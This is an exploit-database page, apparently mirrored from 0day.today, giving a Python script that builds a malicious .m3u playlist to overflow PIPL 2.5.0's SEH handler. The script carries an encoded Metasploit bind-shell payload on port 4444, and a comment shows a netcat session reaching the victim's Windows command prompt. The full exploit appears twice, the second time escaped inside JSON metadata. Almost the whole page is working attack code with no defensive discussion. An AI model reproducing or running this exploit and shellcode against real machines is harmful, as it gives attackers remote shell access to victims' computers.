Search...

PIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)

2009-08-28T00:00:00

ID 1337DAY-ID-8083
Type zdt
Reporter mr_me
Modified 2009-08-28T00:00:00

Description

Exploit for unknown platform in category local exploits

                                        
                                            =================================================================
PIPL &lt;= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)
=================================================================


#!/usr/bin/python
#
#############################################################
# PIPL &lt;= 2.5.0 (.m3u File) Universal bof exploit (SEH)
# Coded by: Steven Seeley aka mr_me 
# Download: http://www.programmedintegration.com/files/pipl.exe
# Tested on Wind0ws XP sp3 & [email protected]
# SEH overwrite, just for kicks
# Surprise surpise m3u file  ;)  but no calc this time muhahaha
# ###########################################################
#
# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke  :) 
#
# [email protected]:~/exploits$ nc -v 192.168.0.6 4444
# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.0.6] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Owner\Desktop&gt; 
#

print "[+] Pipl 2.5.0 local exploit"

bof="\x41" * 4108
nsh="\xEB\x06\x90\x90"
seh="\x17\x07\x01\x10" #xaudio.dll ppr
nops="\x90" * 20

# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
# http://metasploit.com */

sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")

buff = bof + nsh + seh + nops + sc

f1 = open('mr_mes_miX.m3u','w');
f1.write(buff);
f1.close();

print "[+] mr_mes_miX.m3u file created successfully"



#  0day.today [2018-02-19]  #

JSON Vulners Source

Initial Source

{"published": "2009-08-28T00:00:00", "id": "1337DAY-ID-8083", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category local exploits", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-02-19T19:35:32", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-19T19:35:32", "rev": 2}, "vulnersScore": 0.5}, "type": "zdt", "lastseen": "2018-02-19T19:35:32", "edition": 2, "title": "PIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)", "href": "https://0day.today/exploit/description/8083", "modified": "2009-08-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 43, "cvelist": [], "sourceHref": "https://0day.today/exploit/8083", "references": [], "reporter": "mr_me", "sourceData": "=================================================================\r\nPIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)\r\n=================================================================\r\n\r\n\r\n#!/usr/bin/python\r\n#\r\n#############################################################\r\n# PIPL <= 2.5.0 (.m3u File) Universal bof exploit (SEH)\r\n# Coded by: Steven Seeley aka mr_me \r\n# Download: http://www.programmedintegration.com/files/pipl.exe\r\n# Tested on Wind0ws XP sp3 & [email\u00a0protected]\r\n# SEH overwrite, just for kicks\r\n# Surprise surpise m3u file ;) but no calc this time muhahaha\r\n# ###########################################################\r\n#\r\n# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke :) \r\n#\r\n# [email\u00a0protected]:~/exploits$ nc -v 192.168.0.6 4444\r\n# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out\r\n# (UNKNOWN) [192.168.0.6] 4444 (?) open\r\n# Microsoft Windows XP [Version 5.1.2600]\r\n# (C) Copyright 1985-2001 Microsoft Corp.\r\n#\r\n# C:\\Documents and Settings\\Owner\\Desktop> \r\n#\r\n\r\nprint \"[+] Pipl 2.5.0 local exploit\"\r\n\r\nbof=\"\\x41\" * 4108\r\nnsh=\"\\xEB\\x06\\x90\\x90\"\r\nseh=\"\\x17\\x07\\x01\\x10\" #xaudio.dll ppr\r\nnops=\"\\x90\" * 20\r\n\r\n# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum \r\n# http://metasploit.com */\r\n\r\nsc = (\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\n\"\\x4f\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\"\r\n\"\\x4e\\x56\\x46\\x32\\x46\\x32\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x58\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x43\\x4e\\x42\\x53\\x49\\x54\\x4b\\x38\"\r\n\"\\x46\\x53\\x4b\\x58\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\"\r\n\"\\x46\\x58\\x42\\x4c\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\"\r\n\"\\x44\\x4c\\x4b\\x4e\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x4a\\x42\\x45\\x57\"\r\n\"\\x43\\x4e\\x4b\\x58\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\"\r\n\"\\x4e\\x50\\x4b\\x34\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\"\r\n\"\\x4e\\x52\\x4b\\x48\\x49\\x38\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\"\r\n\"\\x41\\x43\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x33\\x4b\\x58\\x42\\x44\"\r\n\"\\x4e\\x50\\x4b\\x38\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x50\"\r\n\"\\x50\\x35\\x4a\\x46\\x50\\x58\\x50\\x44\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x41\\x53\\x4b\\x4d\\x48\\x36\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x33\"\r\n\"\\x44\\x33\\x4a\\x56\\x47\\x47\\x43\\x47\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x4f\\x35\\x49\\x48\\x45\\x4e\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x50\"\r\n\"\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x50\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x49\\x4d\"\r\n\"\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\"\r\n\"\\x43\\x55\\x43\\x55\\x43\\x45\\x43\\x34\\x43\\x45\\x43\\x34\\x43\\x35\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x48\\x56\\x4a\\x56\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\\x49\\x38\"\r\n\"\\x41\\x4e\\x45\\x49\\x4a\\x46\\x46\\x4a\\x4c\\x51\\x42\\x57\\x47\\x4c\\x47\\x55\"\r\n\"\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\\x41\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\n\"\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\n\"\\x43\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x45\\x4e\\x49\\x44\\x48\\x38\"\r\n\"\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x42\\x55\\x46\\x35\\x46\\x45\\x45\\x35\"\r\n\"\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x56\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\"\r\n\"\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\"\r\n\"\\x46\\x46\\x48\\x36\\x4a\\x46\\x43\\x56\\x4d\\x56\\x49\\x38\\x45\\x4e\\x4c\\x56\"\r\n\"\\x42\\x55\\x49\\x55\\x49\\x52\\x4e\\x4c\\x49\\x48\\x47\\x4e\\x4c\\x36\\x46\\x54\"\r\n\"\\x49\\x58\\x44\\x4e\\x41\\x43\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\"\r\n\"\\x4d\\x32\\x50\\x4f\\x44\\x54\\x4e\\x52\\x43\\x49\\x4d\\x58\\x4c\\x47\\x4a\\x53\"\r\n\"\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\"\r\n\"\\x4f\\x4f\\x45\\x57\\x46\\x54\\x4f\\x4f\\x48\\x4d\\x4b\\x45\\x47\\x35\\x44\\x35\"\r\n\"\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x35\"\r\n\"\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\"\r\n\"\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4f\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4f\\x4e\\x50\\x4c\\x42\\x4e\"\r\n\"\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a\")\r\n\r\nbuff = bof + nsh + seh + nops + sc\r\n\r\nf1 = open('mr_mes_miX.m3u','w');\r\nf1.write(buff);\r\nf1.close();\r\n\r\nprint \"[+] mr_mes_miX.m3u file created successfully\"\r\n\r\n\r\n\n# 0day.today [2018-02-19] #"}

PIPL &lt;= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)

Description

Exploit for unknown platform in category local exploits

PIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)